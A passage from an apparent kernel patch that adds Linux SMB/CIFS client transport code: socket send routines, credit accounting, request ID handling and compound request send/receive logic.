++			    (!server->noblocksnd && (retries > 2))) {
++				cifs_server_dbg(VFS, "sends on sock %p stuck for 15 seconds\n",
++					 ssocket);
++				return -EAGAIN;
++			}
++			msleep(1 << retries);
++			continue;
++		}
++
++		if (rc < 0)
++			return rc;
++
++		if (rc == 0) {
++			/* should never happen, letting socket clear before
++			   retrying is our only obvious option here */
++			cifs_server_dbg(VFS, "tcp sent no data\n");
++			msleep(500);
++			continue;
++		}
++
++		/* send was at least partially successful */
++		*sent += rc;
++		retries = 0; /* in case we get ENOSPC on the next send */
++	}
++	return 0;
++}
++
++unsigned long
++smb_rqst_len(struct TCP_Server_Info *server, struct smb_rqst *rqst)
++{
++	unsigned int i;
++	struct kvec *iov;
++	int nvec;
++	unsigned long buflen = 0;
++
++	if (!is_smb1(server) && rqst->rq_nvec >= 2 &&
++	    rqst->rq_iov[0].iov_len == 4) {
++		iov = &rqst->rq_iov[1];
++		nvec = rqst->rq_nvec - 1;
++	} else {
++		iov = rqst->rq_iov;
++		nvec = rqst->rq_nvec;
++	}
++
++	/* total up iov array first */
++	for (i = 0; i < nvec; i++)
++		buflen += iov[i].iov_len;
++
++	/*
++	 * Add in the page array if there is one. The caller needs to make
++	 * sure rq_offset and rq_tailsz are set correctly. If a buffer of
++	 * multiple pages ends at page boundary, rq_tailsz needs to be set to
++	 * PAGE_SIZE.
++	 */
++	if (rqst->rq_npages) {
++		if (rqst->rq_npages == 1)
++			buflen += rqst->rq_tailsz;
++		else {
++			/*
++			 * If there is more than one page, calculate the
++			 * buffer length based on rq_offset and rq_tailsz
++			 */
++			buflen += rqst->rq_pagesz * (rqst->rq_npages - 1) -
++					rqst->rq_offset;
++			buflen += rqst->rq_tailsz;
++		}
++	}
++
++	return buflen;
++}
++
++static int
++__smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
++		struct smb_rqst *rqst)
++{
++	int rc;
++	struct kvec *iov;
++	int n_vec;
++	unsigned int send_length = 0;
++	unsigned int i, j;
++	sigset_t mask, oldmask;
++	size_t total_len = 0, sent, size;
++	struct socket *ssocket = server->ssocket;
++	struct msghdr smb_msg = {};
++	__be32 rfc1002_marker;
++
++	cifs_in_send_inc(server);
++	if (cifs_rdma_enabled(server)) {
++		/* return -EAGAIN when connecting or reconnecting */
++		rc = -EAGAIN;
++		if (server->smbd_conn)
++			rc = smbd_send(server, num_rqst, rqst);
++		goto smbd_done;
++	}
++
++	rc = -EAGAIN;
++	if (ssocket == NULL)
++		goto out;
++
++	rc = -ERESTARTSYS;
++	if (fatal_signal_pending(current)) {
++		cifs_dbg(FYI, "signal pending before send request\n");
++		goto out;
++	}
++
++	rc = 0;
++	/* cork the socket */
++	tcp_sock_set_cork(ssocket->sk, true);
++
++	for (j = 0; j < num_rqst; j++)
++		send_length += smb_rqst_len(server, &rqst[j]);
++	rfc1002_marker = cpu_to_be32(send_length);
++
++	/*
++	 * We should not allow signals to interrupt the network send because
++	 * any partial send will cause session reconnects thus increasing
++	 * latency of system calls and overload a server with unnecessary
++	 * requests.
++	 */
++
++	sigfillset(&mask);
++	sigprocmask(SIG_BLOCK, &mask, &oldmask);
++
++	/* Generate a rfc1002 marker for SMB2+ */
++	if (!is_smb1(server)) {
++		struct kvec hiov = {
++			.iov_base = &rfc1002_marker,
++			.iov_len  = 4
++		};
++		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, &hiov, 1, 4);
++		rc = smb_send_kvec(server, &smb_msg, &sent);
++		if (rc < 0)
++			goto unmask;
++
++		total_len += sent;
++		send_length += 4;
++	}
++
++	cifs_dbg(FYI, "Sending smb: smb_len=%u\n", send_length);
++
++	for (j = 0; j < num_rqst; j++) {
++		iov = rqst[j].rq_iov;
++		n_vec = rqst[j].rq_nvec;
++
++		size = 0;
++		for (i = 0; i < n_vec; i++) {
++			dump_smb(iov[i].iov_base, iov[i].iov_len);
++			size += iov[i].iov_len;
++		}
++
++		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, iov, n_vec, size);
++
++		rc = smb_send_kvec(server, &smb_msg, &sent);
++		if (rc < 0)
++			goto unmask;
++
++		total_len += sent;
++
++		/* now walk the page array and send each page in it */
++		for (i = 0; i < rqst[j].rq_npages; i++) {
++			struct bio_vec bvec;
++
++			bvec.bv_page = rqst[j].rq_pages[i];
++			rqst_page_get_length(&rqst[j], i, &bvec.bv_len,
++					     &bvec.bv_offset);
++
++			iov_iter_bvec(&smb_msg.msg_iter, ITER_SOURCE,
++				      &bvec, 1, bvec.bv_len);
++			rc = smb_send_kvec(server, &smb_msg, &sent);
++			if (rc < 0)
++				break;
++
++			total_len += sent;
++		}
++	}
++
++unmask:
++	sigprocmask(SIG_SETMASK, &oldmask, NULL);
++
++	/*
++	 * If signal is pending but we have already sent the whole packet to
++	 * the server we need to return success status to allow a corresponding
++	 * mid entry to be kept in the pending requests queue thus allowing
++	 * to handle responses from the server by the client.
++	 *
++	 * If only part of the packet has been sent there is no need to hide
++	 * interrupt because the session will be reconnected anyway, so there
++	 * won't be any response from the server to handle.
++	 */
++
++	if (signal_pending(current) && (total_len != send_length)) {
++		cifs_dbg(FYI, "signal is pending after attempt to send\n");
++		rc = -ERESTARTSYS;
++	}
++
++	/* uncork it */
++	tcp_sock_set_cork(ssocket->sk, false);
++
++	if ((total_len > 0) && (total_len != send_length)) {
++		cifs_dbg(FYI, "partial send (wanted=%u sent=%zu): terminating session\n",
++			 send_length, total_len);
++		/*
++		 * If we have only sent part of an SMB then the next SMB could
++		 * be taken as the remainder of this one. We need to kill the
++		 * socket so the server throws away the partial SMB
++		 */
++		cifs_signal_cifsd_for_reconnect(server, false);
++		trace_smb3_partial_send_reconnect(server->CurrentMid,
++						  server->conn_id, server->hostname);
++	}
++smbd_done:
++	if (rc < 0 && rc != -EINTR)
++		cifs_server_dbg(VFS, "Error %d sending data on socket to server\n",
++			 rc);
++	else if (rc > 0)
++		rc = 0;
++out:
++	cifs_in_send_dec(server);
++	return rc;
++}
++
++static int
++smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
++	      struct smb_rqst *rqst, int flags)
++{
++	struct kvec iov;
++	struct smb2_transform_hdr *tr_hdr;
++	struct smb_rqst cur_rqst[MAX_COMPOUND];
++	int rc;
++
++	if (!(flags & CIFS_TRANSFORM_REQ))
++		return __smb_send_rqst(server, num_rqst, rqst);
++
++	if (num_rqst > MAX_COMPOUND - 1)
++		return -ENOMEM;
++
++	if (!server->ops->init_transform_rq) {
++		cifs_server_dbg(VFS, "Encryption requested but transform callback is missing\n");
++		return -EIO;
++	}
++
++	tr_hdr = kzalloc(sizeof(*tr_hdr), GFP_NOFS);
++	if (!tr_hdr)
++		return -ENOMEM;
++
++	memset(&cur_rqst[0], 0, sizeof(cur_rqst));
++	memset(&iov, 0, sizeof(iov));
++
++	iov.iov_base = tr_hdr;
++	iov.iov_len = sizeof(*tr_hdr);
++	cur_rqst[0].rq_iov = &iov;
++	cur_rqst[0].rq_nvec = 1;
++
++	rc = server->ops->init_transform_rq(server, num_rqst + 1,
++					    &cur_rqst[0], rqst);
++	if (rc)
++		goto out;
++
++	rc = __smb_send_rqst(server, num_rqst + 1, &cur_rqst[0]);
++	smb3_free_compound_rqst(num_rqst, &cur_rqst[1]);
++out:
++	kfree(tr_hdr);
++	return rc;
++}
++
++int
++smb_send(struct TCP_Server_Info *server, struct smb_hdr *smb_buffer,
++	 unsigned int smb_buf_length)
++{
++	struct kvec iov[2];
++	struct smb_rqst rqst = { .rq_iov = iov,
++				 .rq_nvec = 2 };
++
++	iov[0].iov_base = smb_buffer;
++	iov[0].iov_len = 4;
++	iov[1].iov_base = (char *)smb_buffer + 4;
++	iov[1].iov_len = smb_buf_length;
++
++	return __smb_send_rqst(server, 1, &rqst);
++}
++
++static int
++wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
++		      const int timeout, const int flags,
++		      unsigned int *instance)
++{
++	long rc;
++	int *credits;
++	int optype;
++	long int t;
++	int scredits, in_flight;
++
++	if (timeout < 0)
++		t = MAX_JIFFY_OFFSET;
++	else
++		t = msecs_to_jiffies(timeout);
++
++	optype = flags & CIFS_OP_MASK;
++
++	*instance = 0;
++
++	credits = server->ops->get_credits_field(server, optype);
++	/* Since an echo is already inflight, no need to wait to send another */
++	if (*credits <= 0 && optype == CIFS_ECHO_OP)
++		return -EAGAIN;
++
++	spin_lock(&server->req_lock);
++	if ((flags & CIFS_TIMEOUT_MASK) == CIFS_NON_BLOCKING) {
++		/* oplock breaks must not be held up */
++		server->in_flight++;
++		if (server->in_flight > server->max_in_flight)
++			server->max_in_flight = server->in_flight;
++		*credits -= 1;
++		*instance = server->reconnect_instance;
++		scredits = *credits;
++		in_flight = server->in_flight;
++		spin_unlock(&server->req_lock);
++
++		trace_smb3_nblk_credits(server->CurrentMid,
++				server->conn_id, server->hostname, scredits, -1, in_flight);
++		cifs_dbg(FYI, "%s: remove %u credits total=%d\n",
++				__func__, 1, scredits);
++
++		return 0;
++	}
++
++	while (1) {
++		if (*credits < num_credits) {
++			scredits = *credits;
++			spin_unlock(&server->req_lock);
++
++			cifs_num_waiters_inc(server);
++			rc = wait_event_killable_timeout(server->request_q,
++				has_credits(server, credits, num_credits), t);
++			cifs_num_waiters_dec(server);
++			if (!rc) {
++				spin_lock(&server->req_lock);
++				scredits = *credits;
++				in_flight = server->in_flight;
++				spin_unlock(&server->req_lock);
++
++				trace_smb3_credit_timeout(server->CurrentMid,
++						server->conn_id, server->hostname, scredits,
++						num_credits, in_flight);
++				cifs_server_dbg(VFS, "wait timed out after %d ms\n",
++						timeout);
++				return -EBUSY;
++			}
++			if (rc == -ERESTARTSYS)
++				return -ERESTARTSYS;
++			spin_lock(&server->req_lock);
++		} else {
++			spin_unlock(&server->req_lock);
++
++			spin_lock(&server->srv_lock);
++			if (server->tcpStatus == CifsExiting) {
++				spin_unlock(&server->srv_lock);
++				return -ENOENT;
++			}
++			spin_unlock(&server->srv_lock);
++
++			/*
++			 * For normal commands, reserve the last MAX_COMPOUND
++			 * credits to compound requests.
++			 * Otherwise these compounds could be permanently
++			 * starved for credits by single-credit requests.
++			 *
++			 * To prevent spinning CPU, block this thread until
++			 * there are >MAX_COMPOUND credits available.
++			 * But only do this is we already have a lot of
++			 * credits in flight to avoid triggering this check
++			 * for servers that are slow to hand out credits on
++			 * new sessions.
++			 */
++			spin_lock(&server->req_lock);
++			if (!optype && num_credits == 1 &&
++			    server->in_flight > 2 * MAX_COMPOUND &&
++			    *credits <= MAX_COMPOUND) {
++				spin_unlock(&server->req_lock);
++
++				cifs_num_waiters_inc(server);
++				rc = wait_event_killable_timeout(
++					server->request_q,
++					has_credits(server, credits,
++						    MAX_COMPOUND + 1),
++					t);
++				cifs_num_waiters_dec(server);
++				if (!rc) {
++					spin_lock(&server->req_lock);
++					scredits = *credits;
++					in_flight = server->in_flight;
++					spin_unlock(&server->req_lock);
++
++					trace_smb3_credit_timeout(
++							server->CurrentMid,
++							server->conn_id, server->hostname,
++							scredits, num_credits, in_flight);
++					cifs_server_dbg(VFS, "wait timed out after %d ms\n",
++							timeout);
++					return -EBUSY;
++				}
++				if (rc == -ERESTARTSYS)
++					return -ERESTARTSYS;
++				spin_lock(&server->req_lock);
++				continue;
++			}
++
++			/*
++			 * Can not count locking commands against total
++			 * as they are allowed to block on server.
++			 */
++
++			/* update # of requests on the wire to server */
++			if ((flags & CIFS_TIMEOUT_MASK) != CIFS_BLOCKING_OP) {
++				*credits -= num_credits;
++				server->in_flight += num_credits;
++				if (server->in_flight > server->max_in_flight)
++					server->max_in_flight = server->in_flight;
++				*instance = server->reconnect_instance;
++			}
++			scredits = *credits;
++			in_flight = server->in_flight;
++			spin_unlock(&server->req_lock);
++
++			trace_smb3_waitff_credits(server->CurrentMid,
++					server->conn_id, server->hostname, scredits,
++					-(num_credits), in_flight);
++			cifs_dbg(FYI, "%s: remove %u credits total=%d\n",
++					__func__, num_credits, scredits);
++			break;
++		}
++	}
++	return 0;
++}
++
++static int
++wait_for_free_request(struct TCP_Server_Info *server, const int flags,
++		      unsigned int *instance)
++{
++	return wait_for_free_credits(server, 1, -1, flags,
++				     instance);
++}
++
++static int
++wait_for_compound_request(struct TCP_Server_Info *server, int num,
++			  const int flags, unsigned int *instance)
++{
++	int *credits;
++	int scredits, in_flight;
++
++	credits = server->ops->get_credits_field(server, flags & CIFS_OP_MASK);
++
++	spin_lock(&server->req_lock);
++	scredits = *credits;
++	in_flight = server->in_flight;
++
++	if (*credits < num) {
++		/*
++		 * If the server is tight on resources or just gives us less
++		 * credits for other reasons (e.g. requests are coming out of
++		 * order and the server delays granting more credits until it
++		 * processes a missing mid) and we exhausted most available
++		 * credits there may be situations when we try to send
++		 * a compound request but we don't have enough credits. At this
++		 * point the client needs to decide if it should wait for
++		 * additional credits or fail the request. If at least one
++		 * request is in flight there is a high probability that the
++		 * server will return enough credits to satisfy this compound
++		 * request.
++		 *
++		 * Return immediately if no requests in flight since we will be
++		 * stuck on waiting for credits.
++		 */
++		if (server->in_flight == 0) {
++			spin_unlock(&server->req_lock);
++			trace_smb3_insufficient_credits(server->CurrentMid,
++					server->conn_id, server->hostname, scredits,
++					num, in_flight);
++			cifs_dbg(FYI, "%s: %d requests in flight, needed %d total=%d\n",
++					__func__, in_flight, num, scredits);
++			return -EDEADLK;
++		}
++	}
++	spin_unlock(&server->req_lock);
++
++	return wait_for_free_credits(server, num, 60000, flags,
++				     instance);
++}
++
++int
++cifs_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
++		      unsigned int *num, struct cifs_credits *credits)
++{
++	*num = size;
++	credits->value = 0;
++	credits->instance = server->reconnect_instance;
++	return 0;
++}
++
++static int allocate_mid(struct cifs_ses *ses, struct smb_hdr *in_buf,
++			struct mid_q_entry **ppmidQ)
++{
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_NEW) {
++		if ((in_buf->Command != SMB_COM_SESSION_SETUP_ANDX) &&
++			(in_buf->Command != SMB_COM_NEGOTIATE)) {
++			spin_unlock(&ses->ses_lock);
++			return -EAGAIN;
++		}
++		/* else ok - we are setting up session */
++	}
++
++	if (ses->ses_status == SES_EXITING) {
++		/* check if SMB session is bad because we are setting it up */
++		if (in_buf->Command != SMB_COM_LOGOFF_ANDX) {
++			spin_unlock(&ses->ses_lock);
++			return -EAGAIN;
++		}
++		/* else ok - we are shutting down session */
++	}
++	spin_unlock(&ses->ses_lock);
++
++	*ppmidQ = alloc_mid(in_buf, ses->server);
++	if (*ppmidQ == NULL)
++		return -ENOMEM;
++	spin_lock(&ses->server->mid_lock);
++	list_add_tail(&(*ppmidQ)->qhead, &ses->server->pending_mid_q);
++	spin_unlock(&ses->server->mid_lock);
++	return 0;
++}
++
++static int
++wait_for_response(struct TCP_Server_Info *server, struct mid_q_entry *midQ)
++{
++	int error;
++
++	error = wait_event_state(server->response_q,
++				 midQ->mid_state != MID_REQUEST_SUBMITTED,
++				 (TASK_KILLABLE|TASK_FREEZABLE_UNSAFE));
++	if (error < 0)
++		return -ERESTARTSYS;
++
++	return 0;
++}
++
++struct mid_q_entry *
++cifs_setup_async_request(struct TCP_Server_Info *server, struct smb_rqst *rqst)
++{
++	int rc;
++	struct smb_hdr *hdr = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++	struct mid_q_entry *mid;
++
++	if (rqst->rq_iov[0].iov_len != 4 ||
++	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
++		return ERR_PTR(-EIO);
++
++	/* enable signing if server requires it */
++	if (server->sign)
++		hdr->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	mid = alloc_mid(hdr, server);
++	if (mid == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	rc = cifs_sign_rqst(rqst, server, &mid->sequence_number);
++	if (rc) {
++		release_mid(mid);
++		return ERR_PTR(rc);
++	}
++
++	return mid;
++}
++
++/*
++ * Send a SMB request and set the callback function in the mid to handle
++ * the result. Caller is responsible for dealing with timeouts.
++ */
++int
++cifs_call_async(struct TCP_Server_Info *server, struct smb_rqst *rqst,
++		mid_receive_t *receive, mid_callback_t *callback,
++		mid_handle_t *handle, void *cbdata, const int flags,
++		const struct cifs_credits *exist_credits)
++{
++	int rc;
++	struct mid_q_entry *mid;
++	struct cifs_credits credits = { .value = 0, .instance = 0 };
++	unsigned int instance;
++	int optype;
++
++	optype = flags & CIFS_OP_MASK;
++
++	if ((flags & CIFS_HAS_CREDITS) == 0) {
++		rc = wait_for_free_request(server, flags, &instance);
++		if (rc)
++			return rc;
++		credits.value = 1;
++		credits.instance = instance;
++	} else
++		instance = exist_credits->instance;
++
++	cifs_server_lock(server);
++
++	/*
++	 * We can't use credits obtained from the previous session to send this
++	 * request. Check if there were reconnects after we obtained credits and
++	 * return -EAGAIN in such cases to let callers handle it.
++	 */
++	if (instance != server->reconnect_instance) {
++		cifs_server_unlock(server);
++		add_credits_and_wake_if(server, &credits, optype);
++		return -EAGAIN;
++	}
++
++	mid = server->ops->setup_async_request(server, rqst);
++	if (IS_ERR(mid)) {
++		cifs_server_unlock(server);
++		add_credits_and_wake_if(server, &credits, optype);
++		return PTR_ERR(mid);
++	}
++
++	mid->receive = receive;
++	mid->callback = callback;
++	mid->callback_data = cbdata;
++	mid->handle = handle;
++	mid->mid_state = MID_REQUEST_SUBMITTED;
++
++	/* put it on the pending_mid_q */
++	spin_lock(&server->mid_lock);
++	list_add_tail(&mid->qhead, &server->pending_mid_q);
++	spin_unlock(&server->mid_lock);
++
++	/*
++	 * Need to store the time in mid before calling I/O. For call_async,
++	 * I/O response may come back and free the mid entry on another thread.
++	 */
++	cifs_save_when_sent(mid);
++	rc = smb_send_rqst(server, 1, rqst, flags);
++
++	if (rc < 0) {
++		revert_current_mid(server, mid->credits);
++		server->sequence_number -= 2;
++		delete_mid(mid);
++	}
++
++	cifs_server_unlock(server);
++
++	if (rc == 0)
++		return 0;
++
++	add_credits_and_wake_if(server, &credits, optype);
++	return rc;
++}
++
++/*
++ *
++ * Send an SMB Request.  No response info (other than return code)
++ * needs to be parsed.
++ *
++ * flags indicate the type of request buffer and how long to wait
++ * and whether to log NT STATUS code (error) before mapping it to POSIX error
++ *
++ */
++int
++SendReceiveNoRsp(const unsigned int xid, struct cifs_ses *ses,
++		 char *in_buf, int flags)
++{
++	int rc;
++	struct kvec iov[1];
++	struct kvec rsp_iov;
++	int resp_buf_type;
++
++	iov[0].iov_base = in_buf;
++	iov[0].iov_len = get_rfc1002_length(in_buf) + 4;
++	flags |= CIFS_NO_RSP_BUF;
++	rc = SendReceive2(xid, ses, iov, 1, &resp_buf_type, flags, &rsp_iov);
++	cifs_dbg(NOISY, "SendRcvNoRsp flags %d rc %d\n", flags, rc);
++
++	return rc;
++}
++
++static int
++cifs_sync_mid_result(struct mid_q_entry *mid, struct TCP_Server_Info *server)
++{
++	int rc = 0;
++
++	cifs_dbg(FYI, "%s: cmd=%d mid=%llu state=%d\n",
++		 __func__, le16_to_cpu(mid->command), mid->mid, mid->mid_state);
++
++	spin_lock(&server->mid_lock);
++	switch (mid->mid_state) {
++	case MID_RESPONSE_RECEIVED:
++		spin_unlock(&server->mid_lock);
++		return rc;
++	case MID_RETRY_NEEDED:
++		rc = -EAGAIN;
++		break;
++	case MID_RESPONSE_MALFORMED:
++		rc = -EIO;
++		break;
++	case MID_SHUTDOWN:
++		rc = -EHOSTDOWN;
++		break;
++	default:
++		if (!(mid->mid_flags & MID_DELETED)) {
++			list_del_init(&mid->qhead);
++			mid->mid_flags |= MID_DELETED;
++		}
++		cifs_server_dbg(VFS, "%s: invalid mid state mid=%llu state=%d\n",
++			 __func__, mid->mid, mid->mid_state);
++		rc = -EIO;
++	}
++	spin_unlock(&server->mid_lock);
++
++	release_mid(mid);
++	return rc;
++}
++
++static inline int
++send_cancel(struct TCP_Server_Info *server, struct smb_rqst *rqst,
++	    struct mid_q_entry *mid)
++{
++	return server->ops->send_cancel ?
++				server->ops->send_cancel(server, rqst, mid) : 0;
++}
++
++int
++cifs_check_receive(struct mid_q_entry *mid, struct TCP_Server_Info *server,
++		   bool log_error)
++{
++	unsigned int len = get_rfc1002_length(mid->resp_buf) + 4;
++
++	dump_smb(mid->resp_buf, min_t(u32, 92, len));
++
++	/* convert the length into a more usable form */
++	if (server->sign) {
++		struct kvec iov[2];
++		int rc = 0;
++		struct smb_rqst rqst = { .rq_iov = iov,
++					 .rq_nvec = 2 };
++
++		iov[0].iov_base = mid->resp_buf;
++		iov[0].iov_len = 4;
++		iov[1].iov_base = (char *)mid->resp_buf + 4;
++		iov[1].iov_len = len - 4;
++		/* FIXME: add code to kill session */
++		rc = cifs_verify_signature(&rqst, server,
++					   mid->sequence_number);
++		if (rc)
++			cifs_server_dbg(VFS, "SMB signature verification returned error = %d\n",
++				 rc);
++	}
++
++	/* BB special case reconnect tid and uid here? */
++	return map_and_check_smb_error(mid, log_error);
++}
++
++struct mid_q_entry *
++cifs_setup_request(struct cifs_ses *ses, struct TCP_Server_Info *ignored,
++		   struct smb_rqst *rqst)
++{
++	int rc;
++	struct smb_hdr *hdr = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++	struct mid_q_entry *mid;
++
++	if (rqst->rq_iov[0].iov_len != 4 ||
++	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
++		return ERR_PTR(-EIO);
++
++	rc = allocate_mid(ses, hdr, &mid);
++	if (rc)
++		return ERR_PTR(rc);
++	rc = cifs_sign_rqst(rqst, ses->server, &mid->sequence_number);
++	if (rc) {
++		delete_mid(mid);
++		return ERR_PTR(rc);
++	}
++	return mid;
++}
++
++static void
++cifs_compound_callback(struct mid_q_entry *mid)
++{
++	struct TCP_Server_Info *server = mid->server;
++	struct cifs_credits credits;
++
++	credits.value = server->ops->get_credits(mid);
++	credits.instance = server->reconnect_instance;
++
++	add_credits(server, &credits, mid->optype);
++}
++
++static void
++cifs_compound_last_callback(struct mid_q_entry *mid)
++{
++	cifs_compound_callback(mid);
++	cifs_wake_up_task(mid);
++}
++
++static void
++cifs_cancelled_callback(struct mid_q_entry *mid)
++{
++	cifs_compound_callback(mid);
++	release_mid(mid);
++}
++
++/*
++ * Return a channel (master if none) of @ses that can be used to send
++ * regular requests.
++ *
++ * If we are currently binding a new channel (negprot/sess.setup),
++ * return the new incomplete channel.
++ */
++struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses)
++{
++	uint index = 0;
++
++	if (!ses)
++		return NULL;
++
++	/* round robin */
++	index = (uint)atomic_inc_return(&ses->chan_seq);
++
++	spin_lock(&ses->chan_lock);
++	index %= ses->chan_count;
++	spin_unlock(&ses->chan_lock);
++
++	return ses->chans[index].server;
++}
++
++int
++compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
++		   struct TCP_Server_Info *server,
++		   const int flags, const int num_rqst, struct smb_rqst *rqst,
++		   int *resp_buf_type, struct kvec *resp_iov)
++{
++	int i, j, optype, rc = 0;
++	struct mid_q_entry *midQ[MAX_COMPOUND];
++	bool cancelled_mid[MAX_COMPOUND] = {false};
++	struct cifs_credits credits[MAX_COMPOUND] = {
++		{ .value = 0, .instance = 0 }
++	};
++	unsigned int instance;
++	char *buf;
++
++	optype = flags & CIFS_OP_MASK;
++
++	for (i = 0; i < num_rqst; i++)
++		resp_buf_type[i] = CIFS_NO_BUFFER;  /* no response buf yet */
++
++	if (!ses || !ses->server || !server) {
++		cifs_dbg(VFS, "Null session\n");
++		return -EIO;
++	}
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return -ENOENT;
++	}
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Wait for all the requests to become available.
++	 * This approach still leaves the possibility to be stuck waiting for
++	 * credits if the server doesn't grant credits to the outstanding
++	 * requests and if the client is completely idle, not generating any
++	 * other requests.
++	 * This can be handled by the eventual session reconnect.
++	 */
++	rc = wait_for_compound_request(server, num_rqst, flags,
++				       &instance);
++	if (rc)
++		return rc;
++
++	for (i = 0; i < num_rqst; i++) {
++		credits[i].value = 1;
++		credits[i].instance = instance;
++	}
++
++	/*
++	 * Make sure that we sign in the same order that we send on this socket
++	 * and avoid races inside tcp sendmsg code that could cause corruption
++	 * of smb data.
++	 */
++
++	cifs_server_lock(server);
++
++	/*
++	 * All the parts of the compound chain belong obtained credits from the
++	 * same session. We can not use credits obtained from the previous
++	 * session to send this request. Check if there were reconnects after
++	 * we obtained credits and return -EAGAIN in such cases to let callers
++	 * handle it.
++	 */
++	if (instance != server->reconnect_instance) {
++		cifs_server_unlock(server);
++		for (j = 0; j < num_rqst; j++)
++			add_credits(server, &credits[j], optype);
++		return -EAGAIN;
++	}
++
++	for (i = 0; i < num_rqst; i++) {
++		midQ[i] = server->ops->setup_request(ses, server, &rqst[i]);
++		if (IS_ERR(midQ[i])) {
++			revert_current_mid(server, i);
++			for (j = 0; j < i; j++)
++				delete_mid(midQ[j]);
++			cifs_server_unlock(server);
++
++			/* Update # of requests on wire to server */
++			for (j = 0; j < num_rqst; j++)
++				add_credits(server, &credits[j], optype);
++			return PTR_ERR(midQ[i]);
++		}
++
++		midQ[i]->mid_state = MID_REQUEST_SUBMITTED;
++		midQ[i]->optype = optype;
++		/*
++		 * Invoke callback for every part of the compound chain
++		 * to calculate credits properly. Wake up this thread only when
++		 * the last element is received.
++		 */
++		if (i < num_rqst - 1)
++			midQ[i]->callback = cifs_compound_callback;
++		else
++			midQ[i]->callback = cifs_compound_last_callback;
++	}
++	rc = smb_send_rqst(server, num_rqst, rqst, flags);
++
++	for (i = 0; i < num_rqst; i++)
++		cifs_save_when_sent(midQ[i]);
++
++	if (rc < 0) {
++		revert_current_mid(server, num_rqst);
++		server->sequence_number -= 2;
++	}
++
++	cifs_server_unlock(server);
++
++	/*
++	 * If sending failed for some reason or it is an oplock break that we
++	 * will not receive a response to - return credits back
++	 */
++	if (rc < 0 || (flags & CIFS_NO_SRV_RSP)) {
++		for (i = 0; i < num_rqst; i++)
++			add_credits(server, &credits[i], optype);
++		goto out;
++	}
++
++	/*
++	 * At this point the request is passed to the network stack - we assume
++	 * that any credits taken from the server structure on the client have
++	 * been spent and we can't return them back. Once we receive responses
++	 * we will collect credits granted by the server in the mid callbacks
++	 * and add those credits to the server structure.
++	 */
++
++	/*
++	 * Compounding is never used during session establish.
++	 */
++	spin_lock(&ses->ses_lock);
++	if ((ses->ses_status == SES_NEW) || (optype & CIFS_NEG_OP) || (optype & CIFS_SESS_OP)) {
++		spin_unlock(&ses->ses_lock);
++
++		cifs_server_lock(server);
++		smb311_update_preauth_hash(ses, server, rqst[0].rq_iov, rqst[0].rq_nvec);
++		cifs_server_unlock(server);
++
++		spin_lock(&ses->ses_lock);
++	}
++	spin_unlock(&ses->ses_lock);
++
++	for (i = 0; i < num_rqst; i++) {
++		rc = wait_for_response(server, midQ[i]);
++		if (rc != 0)
++			break;
++	}
++	if (rc != 0) {
++		for (; i < num_rqst; i++) {
++			cifs_server_dbg(FYI, "Cancelling wait for mid %llu cmd: %d\n",
++				 midQ[i]->mid, le16_to_cpu(midQ[i]->command));
++			send_cancel(server, &rqst[i], midQ[i]);
++			spin_lock(&server->mid_lock);
++			midQ[i]->mid_flags |= MID_WAIT_CANCELLED;
++			if (midQ[i]->mid_state == MID_REQUEST_SUBMITTED) {
++				midQ[i]->callback = cifs_cancelled_callback;
++				cancelled_mid[i] = true;
++				credits[i].value = 0;
++			}
++			spin_unlock(&server->mid_lock);
++		}
++	}
++
++	for (i = 0; i < num_rqst; i++) {
++		if (rc < 0)
++			goto out;
++
++		rc = cifs_sync_mid_result(midQ[i], server);
++		if (rc != 0) {
++			/* mark this mid as cancelled to not free it below */
++			cancelled_mid[i] = true;
++			goto out;
++		}
++
++		if (!midQ[i]->resp_buf ||
++		    midQ[i]->mid_state != MID_RESPONSE_RECEIVED) {
++			rc = -EIO;
++			cifs_dbg(FYI, "Bad MID state?\n");
++			goto out;
++		}
++
++		buf = (char *)midQ[i]->resp_buf;
++		resp_iov[i].iov_base = buf;
++		resp_iov[i].iov_len = midQ[i]->resp_buf_size +
++			HEADER_PREAMBLE_SIZE(server);
++
++		if (midQ[i]->large_buf)
++			resp_buf_type[i] = CIFS_LARGE_BUFFER;
++		else
++			resp_buf_type[i] = CIFS_SMALL_BUFFER;
++
++		rc = server->ops->check_receive(midQ[i], server,
++						     flags & CIFS_LOG_ERROR);
++
++		/* mark it so buf will not be freed by delete_mid */
++		if ((flags & CIFS_NO_RSP_BUF) == 0)
++			midQ[i]->resp_buf = NULL;
++
++	}
++
++	/*
++	 * Compounding is never used during session establish.
++	 */
++	spin_lock(&ses->ses_lock);
++	if ((ses->ses_status == SES_NEW) || (optype & CIFS_NEG_OP) || (optype & CIFS_SESS_OP)) {
++		struct kvec iov = {
++			.iov_base = resp_iov[0].iov_base,
++			.iov_len = resp_iov[0].iov_len
++		};
++		spin_unlock(&ses->ses_lock);
++		cifs_server_lock(server);
++		smb311_update_preauth_hash(ses, server, &iov, 1);
++		cifs_server_unlock(server);
++		spin_lock(&ses->ses_lock);
++	}
++	spin_unlock(&ses->ses_lock);
++
++out:
++	/*
++	 * This will dequeue all mids. After this it is important that the
++	 * demultiplex_thread will not process any of these mids any futher.
++	 * This is prevented above by using a noop callback that will not
++	 * wake this thread except for the very last PDU.
++	 */
++	for (i = 0; i < num_rqst; i++) {
++		if (!cancelled_mid[i])
++			delete_mid(midQ[i]);
++	}
++
++	return rc;
++}
++
++int
++cifs_send_recv(const unsigned int xid, struct cifs_ses *ses,
++	       struct TCP_Server_Info *server,
++	       struct smb_rqst *rqst, int *resp_buf_type, const int flags,
